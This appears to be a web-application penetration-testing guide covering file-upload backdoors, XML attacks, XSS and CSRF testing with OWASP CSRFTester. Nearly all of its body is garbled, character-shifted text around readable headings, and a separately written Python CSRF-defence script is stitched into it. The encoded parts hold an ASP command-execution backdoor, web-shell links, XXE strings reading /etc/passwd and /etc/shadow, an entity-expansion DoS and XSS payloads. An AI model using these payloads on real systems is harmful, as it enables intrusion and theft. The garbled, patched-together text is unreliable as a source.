 %DSDQLHMDSGDK@MFT@FDTRDCAXSGD@OOKHB@SHNM "41+411)1

 6OKN@C@KDFHSHL@SDEHKD@MC@M@KXYDSGD)5.-RNTQBDBNMS@HMHMFSGDKHMJSNXNTQEHKD
5@JDMNSDNESGDENKKNVHMF
8@RSGDEHKDQDM@LDCNQJDOSSGDR@LD@RSGDEHKDSG@SXNTTOKN@CDC
%DSDQLHMDSGDETKK63*SNSGDTOKN@CDCSNJMNVVGDQDSNAQNVRDSNNTQBTRSNL
A@BJCNNQ
 "SSDLOSSNTOKN@C@A@BJCNNQ *MSGDB@RDNESGD"41A@BJCNNQ SGHR@KRNQDPTHQDR@
BNOXNEBLCDWDSNADTOKN@CDC@RVDKK
 *MUNJDSGDA@BJCNNQ O@RRHMFXNTQRGDKKBNLL@MCRUH@SGDO@Q@LDSDQU@QH@AKD
1KD@RDMNSDSG@S45%&33LDRR@FDRVHKKMNSADUHDV@AKDVGDMQTMMHMFBNLL@MCRVHSG
SGD"41A@BJCNNQBNCDDW@LOKD
ASP Backdoor Code
/NSD 5GHRBNCDQDPTHQDR@BNOXNEBLCDWDSNADTOKN@CDC *MSGHRDW@LOKD HSHR
QDM@LDCYYYDWD "41#@BJCNNQBNCDAX.$
4DQUDQ$QD@SD0AIDBS VRBQHOSRGDKK
DWDB 4DQUDQ.@O1@SG 
=YYYDWDB
QDPTDRS BLC

RSCNTSQD@C@KK
5GDA@BJCNNQB@KKDCETM@ROHRHMUNJDC@RENKKNVR
VVVUHBSHLBNLO@SGSNTOKN@CRETM@RO BLCMDSRS@S @M
*ESGDRHSDOQDUDMSRXNTEQNLTOKN@CHMF@BLCDWDEHKD GDQD@QDRNLDNSGDQTRDETK"41
SNNKR
 CHQ@ROAX+@BNA(H@MM@MSNMHN HMUNJDC@RENKKNVR VVVUHBSHLBNLO@SGSN
TOKN@CRCHQ@RO O@SGB=
GSLK
ANCX

%HLNAI'40 NAI'HKD NAI'NKCDQ
4DSNAI'404DQUDQ$QD@SD0AIDBS 4BQHOSHMF'HKD4XRSDL0AIDBS

4DSNAI'NKCDQNAI'40(DS'NKCDQ 3DPTDRS2TDQX4SQHMF O@SG

'NQ&@BGNAI'HKDHMNAI'NKCDQ'HKDR
3DRONMRD8QHSDNAI'HKD/@LDAQ

/DWS
4DSNAI'NKCDQ/NSGHMF
4DSNAI'40/NSGHMF

ANCX
GSLK
 B@S@ROAX+@BNA(H@MM@MSNMHN HMUNJDC@RENKKNVR VVVUHBSHLBNLO@SGSN
TOKN@CRB@S@RO O@SGB=ANNSHMH
GSLK
ANCX

$NMRS'NQ3D@CHMF
$NMRS'NQ8QHSHMF
$NMRS'NQ"OODMCHMF
$NMRS5QHRS@SD6RD%DE@TKS
$NMRS5QHRS@SD5QTD
$NMRS5QHRS@SD'@KRD
%HLN'4
%HLN'HKD
%HLN4SQD@L
4DSN'44DQUDQ$QD@SD0AIDBS 4BQHOSHMF'HKD4XRSDL0AIDBS

4DSN'HKDN'4(DS'HKD 3DPTDRS2TDQX4SQHMF O@SG

4DSN4SQD@LN'HKD0ODM"R5DWS4SQD@L 'NQ3D@CHMF 5QHRS@SD6RD%DE@TKS

%N8GHKD/NSN4SQD@L"S&MC0E4SQD@L
R3DBNQCN4SQD@L3D@C-HMD
3DRONMRD8QHSD R3DBNQC
-NNO
N4SQD@L$KNRD

ANCX
GSLK
*E@MXA@BJCNNQEHKDR@OOD@QSNADTOKN@CDCRTBBDRRETKKXATSE@HKSNOQNCTBD@MXNTSOTS HS
BNTKCADSG@SSGDTOKN@CENKCDQCNDRMNSG@UDDWDBTSHNMOQHUHKDFDR *MSGHRB@RD @SSDLOS
SNLNCHEXSGDO@Q@LDSDQU@QH@AKDRNESGDTOKN@C@OOKHB@SHNM@MCRDDHEHSHRONRRHAKDSN
ODQENQL@CHQDBSNQXSQ@UDQR@K@SS@BJNMSGDCDRSHM@SHNMENKCDQ SGDMAQNVRDSN@ENKCDQ
SG@SHRGNKCHMFSGDKDFHSHL@SDVDA@OOKHB@SHNMBNCD@MCCQNOSGDA@BJCNNQSGDQD *EHSHR
MNSONRRHAKDSNAQD@JNTSNESGDTOKN@CENKCDQVHSGMNDWDBTSHNMOQHUHKDFDR @SSDLOSSN@S
KD@RSOTS@QAHSQ@QX)5.-+@U@RBQHOSHMSN@EHKD 5G@SRGNTKCFDSQDMCDQDCNMSGDRDQUDQ
@MCMNSDC@R@ODQRHRSDMS944UTKMDQ@AHKHSX

)DQD@QDRNLDVDARGDKKR
GSSOLHBG@DKC@VNQFOQNIDBSRVABUAS@QFY
GSSONODMK@ARNQFG@BJDQ?VDAJHSS@QFY
GSSOODMSDRSLNMJDXMDSSNNKROGOEHMCRNBJRGDKKOGOEHMCRNBJ

RGDKKS@QFY
GSSOODMSDRSLNMJDXMDSSNNKROGOQDUDQRDRGDKKOGOQDUDQRD
RGDKKS@QFY
GSSOODMSDRSLNMJDXMDSSNNKRODQKQDUDQRDRGDKKODQKQDUDQRD
RGDKKS@QFY

XML Attacks
XML Content Attack Strings
<$%"5"<RBQHOSU@QMVGHKD SQTD
ZM \RBQHOS>>
 WLKUDQRHNM
DMBNCHMF*40 ENN<$%"5"<>>4$3*15<$%"5"<>>@KDQS ID
<$%"5"<>>
4$3*15<$%"5"<>>ENN
 WLKUDQRHNMDMBNCHMF*40 ENN<$%"5"<NQNQ
>>ENN
 WLKUDQRHNMDMBNCHMF*40 %0$5:1&ENN<&-&.&/5ENN
"/:&/5*5:WWD4:45&.EHKDBANNSHMH>ENNWWDENN
 WLKUDQRHNMDMBNCHMF*40 %0$5:1&ENN<&-&.&/5ENN
"/:&/5*5:WWD4:45&.EHKDDSBO@RRVC>ENNWWDENN
 WLKUDQRHNMDMBNCHMF*40 %0$5:1&ENN<&-&.&/5ENN
"/:&/5*5:WWD4:45&.EHKDDSBRG@CNV>ENNWWDENN
 WLKUDQRHNMDMBNCHMF*40 %0$5:1&ENN<&-&.&/5ENN
"/:&/5*5:WWD4:45&.EHKDCDUQ@MCNL>ENNWWDENN

XML DoS Attack


%N4BNMCHSHNMRB@MADB@TRDCNML@MXCHEEDQDMSKDUDKR RNBQD@SHUHSXHRDRRDMSH@K0MD
BNLLNMDW@LOKDHR@ATRHMF@O@QRDQbRG@MCKHMFNE%5%QDBTQRHNMAXHMIDBSHMFRNLDSGHMF

KHJDSGHRHMSNKDFHSHL@SD9.-
%0$5:1&ENNA@Q<
&/5*5:WGHSGDQD&/5*5:WWW&/5*5:WWW&/5*5:
WWW&/5*5:WWW

&/5*5:WWW&/5*5:WWW&/5*5:W
WW&/5*5:WWW&/5*5:WWW
&/5*5:WWW>
ENNA@QWENNA@Q

5G@SbR@KNSNESXOHMF VDCNMbSCNSG@S@ROQNFQ@LLDQR)DQDHR@RHLOKDOXSGNMRBQHOS
SG@SCNDRSGHR
HLONQSRXR
ENQHHMQ@MFD 

WH
RXRRSCNTSVQHSD &/5*5:WR=WRWR= H W W


*EXNTHMIDBSDMNTFG SG@SHR HMR@MD@LNTMSRNE


C@S@CHQDBSKXHMSNSGD9.-O@XKN@C
@MNSGDQSXODNE%N4BNMCHSHNML@XAD@BGHDUDC5@JDENQDW@LOKDSGDENKKNVHMF
HMIDBSHNM

VRRD4DBTQHSX
"SS@BJ5@F"SS@BJ7@KTD"SS@BJ5@F
"SS@BJ5@F"SS@BJ7@KTD"SS@BJ5@F

"SS@BJ5@F"SS@BJ7@KTD"SS@BJ5@F
"SS@BJ5@F"SS@BJ7@KTD"SS@BJ5@F
VRRD4DBTQHSX

*L@FHMDSGHR"SS@BJ5@FDKDLDMSADHMFHMIDBSDCSHLDR ENQHMRS@MBD.DRRHMFVHSG
SGD@BST@KRSQTBSTQDNERDDLHMFKXKDFHSHL@SD SNSGDO@QRDQ
9.-HMSGHRV@XVHKKENQBDSGD
O@QRDQSNSQX@MCCD@KVHSGSGDC@S@OQDRDMSDCSNHS4NLDSGQDRGNKCVHKKDUDMST@KKXFDS
GHS5G@SSGQDRGNKCHRVG@SXNT@QD@ESDQ RNXNTLTRSCNBTLDMSHS@MCSGDQDODQBTRRHNMR
NEHSFDSSHMFQD@BGDC

)TFDA@RDDMBNCDCRSQHMFRVHKKFDSSQD@SDC@RAHM@QXC@S@ RNHMIDBSHMFRNLDSGHMFKHJD
SGHRHMSNSGD9.-O@XKN@CL@X@KRNXHDKCRNLDHMSDQDRSHMFQDRTKSR

VRRD4DBTQHSX
"SS@BJ5@F
"SS@BJ7@KTD
)GMMDNP3LB)4O1L&18@5@K1$/C,&HM3#(/1U0OY8/NNI':WI"K/Y$-WU9ELI$B"
VN@3YD&K$#BB(N MF:KLJCC@X##YIBB),BXV%JM,N+:AVS @CWUX(6+DMSI2

BHVYD 5(8F7QN@2C61Q%*+8RWYS8:@V HN A$58"/DJF,Q
"MKE0C7UU3JD4W
;4Y92XT'DP RQ+HC)EVFRMU21"D6
"SS@BJ5@F

VRRD4DBTQHSX

XML Parser Overload
:NTB@MNUDQKN@CSGDO@QRDQHEXNTFHUDHSDMNTFGRSQ@MFDC@S@SG@SHSSQHDRSN@BST@KKX
OQNODQKXG@MCKD)DQDHR@MDW@LOKD

VRRD4DBTQHSX
"SS@BJ5@FS@F99S@F99S@F99S@F99
"SS@BJ7@KTD
"SS@BJ5@F
"SS@BJ5@FS@F9S@F9S@F9S@F9
"SS@BJ7@KTD
"SS@BJ5@F

VRRD4DBTQHSX

&MUHRHNM@M@SS@BJVGDQDSGDANFTR@SSQHATSDRADHMFHMIDBSDCVDQDPTHSDK@QFDHMMTLADQ
5GHRVNTKCOTSPTHSD@RSQ@HMNMSGDO@QRDQ"MNSGDQ@SS@BJSDBGMHPTDHREDDCHMFSGD
O@QRDQ9.-SG@SHRHMBNLOKDSD MNSVDKKENQLDC NQMNSU@KHC`ENQDW@LOKD BNLAHMHMF
GTFD@LNTMSRNEC@S@VHSG@O@SSDQMNEMNBKNRHMFS@FR4NLDSGHMFKHJDSGHRBNTKCG@UD
@MHMSDQDRSHMFDEEDBSNMSGDS@QFDSHMEQ@RSQTBSTQD

VRRD4DBTQHSX

"SS@BJ5@F
"SS@BJ5@F
"SS@BJ5@F

"SS@BJ5@F
"SS@BJ5@F
"SS@BJ5@F
VRRD4DBTQHSX


XML Injection
"ESDQXNTTMCDQRS@MCSGDC@S@XNT@QDTO@F@HMRS HSL@XADONRRHAKDSNCNRNLD
HMIDBSHNMCHQDBSKXHMSNSGD9.-@MCRDDGNVSGDRDQUHBDQDRONMCR5GDNMDS@BSHBXNT
RGNTKC@KV@XRSQXHRE@KRDKXSDQLHM@SHMF@S@F L@JHMF@MHMIDBSHNM @MCSGDMOQNODQKX
SDQLHM@SHMFSNSQX@MCENQBDOQNBDRRHMFNEXNTQLNCHEHDC9.-)DQDHR@RHLOKDDW@LOKD
VHSGSGDHMIDBSHNMHMANKC
DLOKNXDD
DLO*%DLO*%
DLO/@LD+ND5DRSDQDLO/@LD
DLO&L@HKIND!DW@LOKDBNLDLO&L@HKDLO*%DLO*%
DLO&L@HKRNLD!SGHMFBNLDLO&L@HK

DLOKNXDD

Manual XSS

Identifying XSS

-DSRRS@QSVHSGRNLDONOTK@QATSFDMDQHB944O@XKN@CR&@BGO@XKN@CHRDMBNCDCHMGDW
VHSGSGDDWBDOSHNMNESGDQCNMDVGHBGHRO@QSH@KKXDMBNCDCHMGDW @MCG@RSGD@BST@K
@KDQSLDRR@FDDMBNCDCHMCDBHL@K*LLDCH@SDKXTMCDQD@BGDMBNCDCO@XKN@CHRSGDGDW
CDBHL@KSN@RBHHBNMUDQRHNMNESGDO@XKN@CRNXNTB@MFDS@ADSSDQHCD@NEVG@SHRFNHMF

NM

Payloads:

&$RBQHOS&@KDQSID$'RBQHOS&
BNMUDQRHNM RBQHOS@KDQS ID
RBQHOS

&*.(43$=I@U@RBQHOS@KDQS ID
=
BNMUDQRHNM *.(43$=I@U@RBQHOS@KDQS ID
=

&RBQHOS@KDQS 4SQHMFEQNL$G@Q$NCD                


BNMUDQRHNM RBQHOS@KDQS 4SQHMFEQNL$G@Q$NCD ID3NBJR%@944

RBQHOS

=IDZ
\
BNMUDQRHNM =IDZ
\

@KDQS 
=@KDQS 
@KDQS 
=@KDQS 
&$
4$3*15&&&$4$3*15&@KDQS ID
$
4$3*15&Z\
\@KDQS 
ETMBSHNM
BNMUDQRHNM @KDQS 
=@KDQS 
@KDQS 
=@KDQS 

4$3*154$3*15@KDQS ID
4$3*15Z\
\@KDQS 
ETMBSHNM

SDWS@QD@RBQHOS@KDQS ID
RBQHOS
BNMUDQRHNM SDWS@QD@RBQHOS@KDQS ID
RBQHOS

&$RBQHOS&$RBQHOS&@KDQS 
$RBQHOS&
BNMUDQRHNM RBQHOSRBQHOS@KDQS 
RBQHOS

Attacking a URL

.XLDSGNCNKNFXENQSGHRHR@KNSKHJDGNV*FN@ESDQ42-*MIDBSHNM-NNJENQO@Q@LDSDQ
O@RRHMFHMSGD63-
&W@LOKD
GSSOVVVHBDBTADBNL BNMSDMSMDVR

*MSGHRB@RDVDRDDSG@SMDVRHRSGDO@Q@LDSDQADHMFO@RRDCSNBNMSDMS4NMNVQHFGS
@KNMFSGDR@LDKHMDRNEVG@SVDCNVHSG42-HMIDBSHNMVDB@MHMRDQSD@BGNENTQ944
O@XKN@CRHMSNSGD63-AXITRSQDOK@BHMFSGDMDVRO@Q@LDSDQVHSGNTQ944O@XKN@C

GSSOVVVHBDBTADBNL BNMSDMS<*/4&359441":-0"%)&3&>
"KKXNTCNHRITRSV@SBGENQ@ONOTOD@BGSHLDVDHMRDQSNTQO@XKN@C
"ESDQRNLDLDRRHMF@QNTMC*ENTMCSG@SSGHRO@XKN@CRGNVMADKNVVNQJDC ATSHSNMKX
VNQJDCVHSGSGD@KDQSRSQHMFADHMFMTLDQHBHMSGHRB@RD
&$RBQHOS&$RBQHOS&@KDQS 
$RBQHOS&
4N@ESDQCNHMFRNLDSGHMJHMF@ANTSHS*EHFTQDCVDKKVGXMNSO@RRSGD@KDQSRSQHMFHM
CDBHL@K

GSSOVVVHBDBTADBNL BNMSDMS&$
RBQHOS&$RBQHOS&@KDQS 4SQHMFEQNL$G@Q$NCD               
RBQHOS&
4TQDDMNTFGSGHRVNQJDCAD@TSHETKKX

Attacking a search box

1@RSD@MXD@BGNESGDO@XKN@CRKHRSDC@ANUDHMSGDVDARHSDRD@QBGANW

XSS in the referrer

<ID!-HMTW-@OSNO]>MBKD@QMRDBTQHSXNMKHMDBNL
(&5)551
3DEDQDQRBQHOS@KDQS UTKMDQ@AKD
RBQHOS

XSS in the user-agent

*MEHQDENWXNTB@MSXOD@ANTSBNMEHFHMSGD@CCQDRRA@Q @MCRD@QBGENQSGDVNQCTRDQ
5GDMBG@MFDSGDTRDQ@FDMSSNADXNTQHMIDBSHNM

Manual Cross Site Request Forgery
CSRFTester
GSSOVVVNV@RONQFHMCDWOGO$@SDFNQX08"41?$43'5DRSDQ?1QNIDBS
GSSOVVVNV@RONQFHMCDWOGO$43'5DRSDQ?6R@FD

Quick Steps
5GDENKKNVHMFHR@MNTSKHMDNESGDRSDORMDBDRR@QXSNK@TMBG@MCTSHKHYDSGD$43'5DRSDQ
 RUMBGDBJNTSGSSONV@ROBRQESDRSDQFNNFKDBNCDBNLRUMSQTMJ
NV@ROBRQESDRSDQQD@CNMKX
 BCNV@ROBRQESDRSDQQD@CNMKXL@HM$43'5DRSDQCHRS
 I@U@I@Q08"41$43'5DRSDQI@Q
 $NMEHFTQDAQNVRDQSNOQNWXSGQNTFG$43'5DRSDQ
 3DBNQCSGDDWDBTSHNMNE@ATRHMDRRETMBSHNM
 .NCHEXSGDO@Q@LDSDQRNESGDQDBNQCDCATRHMDRRETMBSHNM
 (DMDQ@SD@M)5.-QDONQSSG@SB@QQHDRNTSSGDATRHMDRRETMBSHNM
 *M@RDO@Q@SDAQNVRDQVHMCNV @MC@RDO@Q@SDTRDQ
UHDVSGDFDMDQ@SDC)5.EHKD
 *ESGD@BSHNMV@RRTBBDRRETKKXB@QQHDCNTS SGDMSGD@OOKHB@SHNMHRUTKMDQ@AKDSN
$43'

Launch OWASP CSRFTester


5GD$43'5DRSDQCHRSQHATSHNMBNMS@HMRSGQDDEHKDRQTMA@S 08"41$43'5DRSDQI@Q
@MCBNMBTQQDMSI@Q5GDQTMA@SRBQHOSBNMEHFTQDRSGDBK@RRO@SGSNHMBKTCDSGDQDPTHQDC
I@QR@MCHMUNJDRSGD@OOQNOQH@SDL@HMBK@RR$TQQDMSKX SGDA@SBGRBQHOS@RRTLDRXNTQ
+%,QTMSHLDDWHRSRTMCDQ$="OO4DB8NQJADMBG=ICJ=IQD0AUHNTRKX SGHRVHKKMNSADSGD
BNQQDBSKNB@SHNMNEXNTQ+7..@JDRTQDXNT update the JAVA_HOME environment
variable HMQTMA@SADENQD@SSDLOSHMFSNDWDBTSDSGDA@SBGEHKD"RRTLHMFOQNODQ
BNMEHFTQ@SHNM DWDBTSHMFQTMA@SRGNTKCK@TMBG$43'5DRSDQ*E@MDQQNQNBBTQR DUHCDMS
VGDMSGDBNLL@MCKHMDHMSDQE@BDPTHBJKXCHR@OOD@QR BNMRHCDQNODMHMFTO@RDO@Q@SD$-*
@MC$%CHQDBSKXSNSGDENKCDQNEXNTQQTMA@SEHKD@MCDWDBTSDHSUH@BNLL@MCKHMD"MX
DQQNQRSG@SL@XNBBTQVHKKCHROK@XSNRSCNTS

Record Execution of Business Functions


0MBDSGD$43'5DRSDQKN@CRRTBBDRRETKKX VDLTRSQDBNQC@SQ@MR@BSHNMSG@SVDV@MSSN
SDRSENQ$43''HQRS VDLTRSBNMEHFTQDSGDAQNVRDQSNOQNWX@KK)551SQ@EEHBSGQNTFG
$43'5DRSDQ8DB@MBNMEHFTQDSGHROQNWXADG@UHNQHM'HQDENW NM-HMTW
TRHMFSGD&CHS
LDMT4DKDBS1QDEDQDMBDR"CU@MBDC/DSVNQJ4DSSHMFRSNFDSSGDOQNWX
BNMEHFTQ@SHNMCH@KNF

$43'5DRSDQCDE@TKSRSNTRHMFONQSNMKNB@KGNRSENQHSROQNWX:NTMDDCSNBNMEHFTQD
'HQDENWSNQDK@XQDPTDRSRSN$43'5DRSDQ Q@SGDQSG@MEDSBGHMFSGDLHSRDKE @RRGNVMHMSGD
@ANUDHL@FD.@JDRTQDSG@SSGD/N1QNWXENQANWHRAK@MJDCNTS0MBDXNTG@UD
BNMEHFTQDCEHQDENWSNTRDSGDOQNWX RDKDBS0JNM@KKCH@KNFRSNFDSA@BJSNSGDAQNVRDQ
#QNVRDSN@MNM44-VDARHSD @MCSGDMRVHSBGSN$43'5DRSDQ
BCNV@ROBRQESDRSDQQD@CNMKXL@HM$43'5DRSDQCHRS
I@U@I@Q08"41$43'5DRSDQI@QMYH

*ESGDOQNWXV@RRTBBDRRETKKXBNMEHFTQDC $43'5DRSDQVHKKFDMDQ@SDCDATFLDRR@FDRSN
RSCNTSENQ@KKRTARDPTDMS)551QDPTDRSRFDMDQ@SDCAXXNTQAQNVRDQ"SSGHRONHMS VD
MDDCSNKNB@SD@O@QSHBTK@QATRHMDRRETMBSHNMSG@SVDV@MSSNSDRSENQ$43'#QNVRDSN
SGDO@FDVGDQDSGDATRHMDRRETMBSHNM NQETMBSHNMR
@QDEHQRSKN@CDC0MBDSGHRO@FDHR
KNB@SDC RDKDBSSGD4S@QS3DBNQCHMFATSSNMHM$43'5DRSDQ@MCDWDBTSDSGDATRHMDRR
ETMBSHNMNQETMBSHNMR0MBDBNLOKDSD BKHBJSGD4SNO3DBNQCHMFATSSNMVHSGHM
$43'5DRSDQ:NTKKMNSHBDSG@SSGDKHRSNMSGDL@HMRBQDDMMNVG@R@RDQHNTRNEQDPTDRSR
QDBNQCDC5GDRD@QD@KKNESGD(&51045QDPTDRSRFDMDQ@SDCAXNTQAQNVRDQVGHKD
DWDBTSHMFSGDATRHMDRRETMBSHNM R
#XRDKDBSHMFNMDNESGDQNVRHMSGDKHRS VDMNVG@UD
SGD@AHKHSXSNLNCHEXSGDO@Q@LDSDQRSG@SVDQDTRDCSNDWDBTSDSGDATRHMDRRETMBSHNM8D
B@MLNCHEXSGDPTDQXRSQHMFO@Q@LDSDQR@MCENQLO@Q@LDSDQRSGQNTFGSGDHQ
QDRODBSHUDO@MDRNMSGDANSSNLG@KENESGDRBQDDM/NSDSG@SSGDRD@QDSGDU@KTDRVD
VHRGSNSQHBJSGDDMCTRDQHMSNRTALHSSHMF0MBD@KKNESGDO@Q@LDSDQRG@UDADDM
LNCHEHDCSNBNMS@HMXNTQCDRHQDCU@KTDR VD@QDMNVQD@CXSNADFHMFDMDQ@SHMF)5.QDONQSR

Generate HTML Reports


5GD)5.-QDONQSRFDMDQ@SDCAXSGD$43'5DRSDQSNNK@QDTRDCSNB@QQXNTSSGD$43'SDRS
B@RDR@F@HMRSNSGDQTRDQRNESGDVDA@OOKHB@SHNM5NFDMDQ@SD@QDONQS VDEHQRSLTRS
RDKDBS@QDONQSSXOD5GDQDONQSSXODCDSDQLHMDRGNVVDV@MSSGDUHBSHLRAQNVRDQSN
RTALHSSGDOQDUHNTRKXQDBNQCDCQDPTDRSR5GDQDBTQQDMSKXDWHRSRONRRHAKDQDONQSR
ENQLR H'Q@LD *.( 9)3 @MC-HMJ
Forms: This report type will submit the request(s) using auto-posting forms.
iFrame: This report type will submit the request(s) using an auto-submitting iframe tag.
IMG: This report will submit the request(s) using the <img src="..."/> tag.
XHR: This report will submit the request(s) using XMLHttpRequest. Note that
this is subject to the same origin policy.
Link: This report will submit the request(s) when the user clicks a link.
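The five report types above are the submission vectors a CSRF defence has to refuse. The following Python script is an added example and is not part of this page or of the OWASP CSRFTester project: it models each vector as a constructed server-side request (the application origin `https://app.example`, the attacker page, the session cookie, the form body and the server secret are all assumed values) and runs each through a check that rejects state changes over GET, compares the Origin header (Referer as fallback) against the application's own origin, and validates a session-bound synchronizer token.

```python
import hmac
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumed application origin (constructed for this example).
SITE_ORIGIN = "https://app.example"
# Assumed per-deployment secret used to derive synchronizer tokens (constructed).
SERVER_SECRET = b"example-server-secret-not-for-production"


@dataclass
class Request:
    """Minimal model of what the server sees for one browser request."""
    method: str
    origin: Optional[str] = None    # Origin header, None when the browser omits it
    referer: Optional[str] = None   # Referer header, None when stripped
    form: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)


def issue_token(session_id: str) -> str:
    """Synchronizer token bound to the session id (HMAC, so it cannot be forged)."""
    return hmac.new(SERVER_SECRET, session_id.encode(), "sha256").hexdigest()


def _same_origin(url: Optional[str]) -> bool:
    """True only when scheme and host of the header value equal our own origin."""
    if not url:
        return False
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def check_csrf(req: Request) -> Tuple[bool, str]:
    """Return (accepted, reason) for a request that would change server state."""
    # 1. State changes must never ride on GET: this alone defeats the IMG and Link vectors.
    if req.method.upper() != "POST":
        return False, "state change attempted with %s" % req.method
    # 2. Origin (or Referer as fallback) must be our own origin; both absent means refuse,
    #    because the server then cannot prove the request came from its own pages.
    source = req.origin if req.origin is not None else req.referer
    if not _same_origin(source):
        return False, "cross-site source %r" % source
    # 3. The synchronizer token must match the session (defence in depth behind the header check).
    session_id = req.cookies.get("session", "")
    expected = issue_token(session_id) if session_id else ""
    supplied = req.form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid csrf token"
    return True, "ok"


def evaluate_report_types() -> Dict[str, Tuple[bool, str]]:
    """Replay constructed requests shaped like each CSRFTester report type."""
    victim_cookies = {"session": "sess-1234"}       # browser attaches cookies cross-site
    attacker = "https://attacker.example/report.html"  # constructed attacker page
    payload = {"to": "attacker", "amount": "1000"}
    vectors = {
        "Forms": Request("POST", "https://attacker.example", attacker, dict(payload), dict(victim_cookies)),
        "iFrame": Request("POST", "https://attacker.example", attacker, dict(payload), dict(victim_cookies)),
        "IMG": Request("GET", None, attacker, {}, dict(victim_cookies)),
        "XHR": Request("POST", "https://attacker.example", attacker, dict(payload), dict(victim_cookies)),
        "Link": Request("GET", None, attacker, {}, dict(victim_cookies)),
        # Referer stripped (e.g. by a privacy extension) and no Origin: refused, not trusted by default.
        "Forms-no-headers": Request("POST", None, None, dict(payload), dict(victim_cookies)),
        # Genuine submission from the application's own page carrying the session-bound token.
        "legitimate": Request("POST", SITE_ORIGIN, SITE_ORIGIN + "/transfer",
                              {**payload, "csrf_token": issue_token("sess-1234")}, dict(victim_cookies)),
    }
    return {name: check_csrf(r) for name, r in vectors.items()}


if __name__ == "__main__":
    for name, (ok, why) in evaluate_report_types().items():
        print(f"{name:18s} {'ACCEPT' if ok else 'REJECT':6s} {why}")
```

The XHR vector is rejected by the same rule as the forms: a cross-origin XMLHttpRequest still carries the attacker's Origin header, and the same origin policy only hides the response from the attacker, it does not stop the request from reaching the server. A `SameSite` attribute on the session cookie would keep the cookie out of the cross-site requests altogether and is the natural complement to these server-side checks.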
0MBD@QDONQSSXODHRRDKDBSDC XNTB@MNOSHNM@KKXK@TMBGSGDMDVKXFDMDQ@SDCQDONQSHM
XNTQAQNVRDQ5NDM@AKDCHR@AKDSGHRNOSHNM BGDBJTMBGDBJSGD%HROK@XHM#QNVRDQ
BGDBJANWMDWSSNSGD(DMDQ@SD)5.-ATSSNMHMSGDANSSNLQHFGSG@MCBNQMDQ'HM@KKX
VDB@MBKHBJSGD(DMDQ@SD)5.-ATSSNMSNBQD@SDSGD)5.-QDONQSSG@SVHKKRTALHSNTQ
QDBNQCDC @MCONRRHAKXLNCHEHDC
@BSHNMR5NB@QQXNTSSGDSDRSB@RD NODM@MDVAQNVRDQ
HMRS@MBD @TSGDMSHB@SD@R@MNSGDQTRDQVHSG@BBDRRSNSGDR@LDATRHMDRRETMBSHNM R
@MC
G@UDSG@STRDQAQNVRDQK@TMBGSGDMDVKXBQD@SDC)5.-QDONQSEHKD*ESGD@BSHNMV@R
B@QQHDCNTS@ESDQUHDVHMFSGDEHKDHMSGDR@LDAQNVRDQVHMCNVSG@SV@RTRDCSN
@TSGDMSHB@SDSGDMDVTRDQ HDSGDUHBSHL
SGDMSG@SO@QSHBTK@QATRHMDRRETMBSHNMHR
UTKMDQ@AKDSNBQNRRRHSDQDPTDRSENQFDQX

Phase 6: Documentation and Reporting
Results Verification
Identifying False Positives
Assessing Vulnerability Criticality
Report Structure
- Executive Summary
- Risk Matrix
- Best Practices (optional but very useful)
- Final Summary
